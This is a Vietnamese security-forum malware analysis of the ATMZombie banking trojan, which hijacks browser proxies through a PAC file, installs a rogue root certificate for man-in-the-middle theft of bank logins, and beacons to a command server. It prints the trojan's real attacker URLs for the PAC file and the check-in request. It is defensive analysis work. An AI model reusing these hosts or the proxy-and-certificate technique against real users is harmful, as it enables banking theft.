Phân tích mẫu ATMZombie: banking trojan in Israeli waters

Malware

Wh------
08/01/2015
41
56 bài viết
Phân tích mẫu ATMZombie: banking trojan in Israeli waters
Giới thiệu:
ATMZombie là 1 Trojan ngân hàng, ăn cắp tiền từ các tài khoản khách hàng tại các ngân hàng ở Israeli. Phương pháp sử dụng là sửa đổi cấu hình proxy trình duyệt,Các trình duyệt được thiết lập để định tuyến các thông tin liên lạc thông qua máy chủ của kẻ tấn công khi nạn nhân quyết định để đăng nhập vào ngân hàng của mình, bắt tin giữa máy khách hàng và máy chủ(man-in-the-middle), từ đó ăn cắp được tài khoản của khách hàng, sau đó sẽ dùng tài khoản đó chuyển tiền vào tài khoản kẻ trộm(ATMZombie).

Thông tin mẫu phân tích:
MD5: EFA5EA2C511B08D0F8259A10A49B27AD
14899399521.png




Hình 1: Kĩ thuật Man-in-the-middle.​



Các hành vi của malware:
  • Readonly bộ nhớ cache của trình duyệt
  • Thay đổi Proxy
  • Cài đặt thêm 1 chứng thực số
  • Download malware khác, gửi thông tin máy nạn nhân về server
Phân tích chi tiết hành vi, kĩ thuật sử dụng:
  1. Thiết lập thuộc tính readonly bộ nhớ cache của trình duyệt:
+ Mô tả: Tìm đến bộ nhớ cache của trình duyệt. Sử dụng hàm SetFileAttributes với thuộc tính “FileAttribute = READONLY” để readonly cache của opera, chrome, firefox.
14899399521.png


Hình 2: Tìm và SetAttributes cache của trình duyệt.​



+ Chrome:
14899399521.png


Hình 3: ReadOnly cache Chrome.​



+Opera:
14899399521.png


Hình 4: ReadOnly cache Opera.​


+Firefox: Tạo các file js để cấu hình với nội dung như hình vẽ:
148993995211.PNG


Hình 5: Nội dung file js để cấu hình cho FireFox.​
2. Thay đổi Proxy:
+ Mục đích: Đổi cấu hình proxy trình duyệt máy nạn nhân sang máy hacker để bắt gói tin từ nạn nhân đến server(Man-In-The-Middle)

+ Mô tả: Thay đổi registry AutoConfigURL đến đường dẫn 1 file PAC:
“HKLMSoftwarePoliciesMicrosoftWindowsCurrentV ersionInternetSettings”
AutoconfigURL=http://retsback.com/bFWhim/PE8.pac​
148993995212.PNG


Hình 6: Thay đổi proxy trình duyệt.​
+ Nội dung file PAC:​
148993995213.PNG


Hình 7: Nội dung file PAC​
3. Cài đặt thêm 1 chứng thực số CA cho proxy:
+ Mục đích : Để giải mã gói tin thu nhận được, tránh bị người sử dụng nghi ngờ khi truy cập do cảnh báo Certificate.Tạo 1 chứng thực số và đưa vào danh sách các chứng thực gốc của trình duyệt trong máy nạn nhân Root.​
148993995214.PNG


Hình 8: Mô tả quá trình tấn công​
+ Mô tả: Sử dụng API CertCreateCertificateContext, CertAddCertificateContextToStore,..​
148993995215.PNG


Hình 9: Quá trình tạo Cert xem bằng IDA.​
4. Gửi thông tin về server

+ Mô tả: Hàm HttpOpenRequest với tham số:
"retsback.com/z/rtback.php?id=76487640553699523892&ver=0000002&nam e=d5a4b61207294f29c4f8abd317df38"
Trong đó:
+ Server: http://retsback.com
+ id: tên ProductID của Window
+ ver: tên version virus
+ name: tên virus.​
Download file từ server: Sử dụng InternetReadFile().​
148993995216.PNG


Hình 10: Quá trình gửi tin về server​

Mình đã trình bày toàn bộ quá trình phân tích cũng như các kĩ thuật mà ATM Zombie sử dụng. Mình xin kết thúc bài viết ở đây!!!
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bên trên